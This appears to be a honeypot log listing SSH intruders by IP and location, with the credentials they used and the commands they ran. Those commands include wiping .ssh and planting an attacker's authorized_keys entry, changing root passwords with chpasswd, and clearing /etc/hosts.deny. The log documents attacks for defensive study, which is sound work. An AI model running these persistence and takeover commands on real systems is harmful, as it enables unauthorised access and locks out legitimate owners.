$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:XEzhZgFF6nt4"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "123456\nq6Z3ORhKmBVQ\nq6Z3ORhKmBVQ"|passwd|bash
$ echo "123456\nq6Z3ORhKmBVQ\nq6Z3ORhKmBVQ\n"|passwd
🎭 yankee_root_40 (49.51.233.157) β€” Santa Clara, United States Β· 2 sessions Β· 40 cmds
2026-05-19 00:21 EDT Β· as admin/admin.123, claude/Claude2026!
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "admin.123\nZxCPZ2U3vCQQ\nZxCPZ2U3vCQQ"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "admin.123\nZxCPZ2U3vCQQ\nZxCPZ2U3vCQQ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "Claude2026!\nQARjOeeMxkyJ\nQARjOeeMxkyJ"|passwd|bash
$ echo "Claude2026!\nQARjOeeMxkyJ\nQARjOeeMxkyJ\n"|passwd
🎭 cipher_root_80 (103.97.135.244) β€” QuαΊ­n Mα»™t, Vietnam Β· 2 sessions Β· 40 cmds
2026-05-19 00:16 EDT Β· as kibana/kibana, postgres/root
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "kibana\nooPhtXdwZnU6\nooPhtXdwZnU6"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "kibana\nooPhtXdwZnU6\nooPhtXdwZnU6\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "root\nZfcNvnBgfrQ6\nZfcNvnBgfrQ6"|passwd|bash
$ echo "root\nZfcNvnBgfrQ6\nZfcNvnBgfrQ6\n"|passwd
🎭 shadow_root_80 (69.6.235.168) β€” Cota, Colombia Β· 1 session Β· 20 cmds
2026-05-19 00:15 EDT Β· as admin/admin.123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "admin.123\nw44wUMILSihY\nw44wUMILSihY"|passwd|bash
$ Enter new UNIX password:
$ echo "admin.123\nw44wUMILSihY\nw44wUMILSihY\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 durian_root (202.165.29.123) β€” Kuala Lumpur, Malaysia Β· 1 session Β· 19 cmds
2026-05-19 00:00 EDT Β· as root/len
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:ZpOoziDKlCOT"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 stein_root_9 (109.91.4.177) β€” Frankfurt am Main, Germany Β· 2 sessions Β· 40 cmds
2026-05-18 23:38 EDT Β· as ftp-test/ftp-test, ubuntu/1qaz@WSX3edc
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "1qaz@WSX3edc\nXmcyLIhIFgOr\nXmcyLIhIFgOr"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "1qaz@WSX3edc\nXmcyLIhIFgOr\nXmcyLIhIFgOr\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "ftp-test\nt60FVBLoSaID\nt60FVBLoSaID"|passwd|bash
$ echo "ftp-test\nt60FVBLoSaID\nt60FVBLoSaID\n"|passwd
🎭 eagle_root_49 (43.153.16.188) β€” Santa Clara, United States Β· 1 session Β· 20 cmds
2026-05-18 23:28 EDT Β· as kibana/kibana
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "kibana\nldpZhBCb60SH\nldpZhBCb60SH"|passwd|bash
$ Enter new UNIX password:
$ echo "kibana\nldpZhBCb60SH\nldpZhBCb60SH\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_48 (184.94.212.80) β€” Los Angeles, United States Β· 1 session Β· 20 cmds
2026-05-18 23:22 EDT Β· as ubuntu/1qaz@WSX3edc
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1qaz@WSX3edc\nNrr1AVDrEYwk\nNrr1AVDrEYwk"|passwd|bash
$ Enter new UNIX password:
$ echo "1qaz@WSX3edc\nNrr1AVDrEYwk\nNrr1AVDrEYwk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 dragon_root_25 (115.190.185.31) β€” Beijing, China Β· 1 session Β· 1 cmd
2026-05-18 21:45 EDT Β· as root/Admin2025Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 cipher_root_81 (103.173.226.3) β€” QuαΊ­n PhΓΊ NhuαΊ­n, Vietnam Β· 1 session Β· 1 cmd
2026-05-18 20:25 EDT Β· as root/!2026jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_102 (46.62.158.36) β€” Helsinki, Finland Β· 1 session Β· 1 cmd
2026-05-18 20:16 EDT Β· as jimster/Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 shadow_root_81 (85.95.239.229) β€” Umraniye, Turkey Β· 1 session Β· 1 cmd
2026-05-18 20:16 EDT Β· as jimster/jimster2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 strudel_root_12 (167.235.22.47) β€” Nuremberg, Germany Β· 1 session Β· 1 cmd
2026-05-18 19:49 EDT Β· as jimster/jimster123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 tiger_root_21 (49.207.44.11) β€” Vijayawada, India Β· 1 session Β· 1 cmd
2026-05-18 19:46 EDT Β· as jimster/Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 silk_root_23 (101.126.22.12) β€” Chaowai, China Β· 1 session Β· 19 cmds
2026-05-18 19:33 EDT Β· as root/pearson
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:dFE88cQ3elql"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_49 (49.51.184.188) β€” Santa Clara, United States Β· 1 session Β· 19 cmds
2026-05-18 19:25 EDT Β· as root/1975
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Csz3OW40TeKg"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_104 (27.71.16.107) β€” Hanoi, Vietnam Β· 1 session Β· 1 cmd
2026-05-18 19:20 EDT Β· as jimster/@1jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 eagle_root_50 (43.130.60.110) β€” Santa Clara, United States Β· 1 session Β· 2 cmds
2026-05-18 18:04 EDT Β· as root/cmveng123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 burger_root_50 (43.130.11.98) β€” Santa Clara, United States Β· 1 session Β· 2 cmds
2026-05-18 17:59 EDT Β· as root/cmveng123
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 ghost_root_9 (160.250.186.97) β€” Ho Chi Minh City, Vietnam Β· 4 sessions Β· 59 cmds
2026-05-13 13:39 EDT Β· as root/123.321, root/50p0rt3, root/P@ssword1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:4EfCQDddqFLN"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:2z7cuNqnV6El"|chpasswd|bash
$ echo "root:524Ui5lg0LJB"|chpasswd|bash
🎭 lantern_root_33 (222.208.64.40) β€” Nanchong, China Β· 1 session Β· 19 cmds
2026-05-18 17:45 EDT Β· as root/50p0rt3
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:z42a4eu3D4pR"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_103 (196.0.120.211) β€” Kampala, Uganda Β· 1 session Β· 2 cmds
2026-05-18 17:35 EDT Β· as root/qwer123$
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
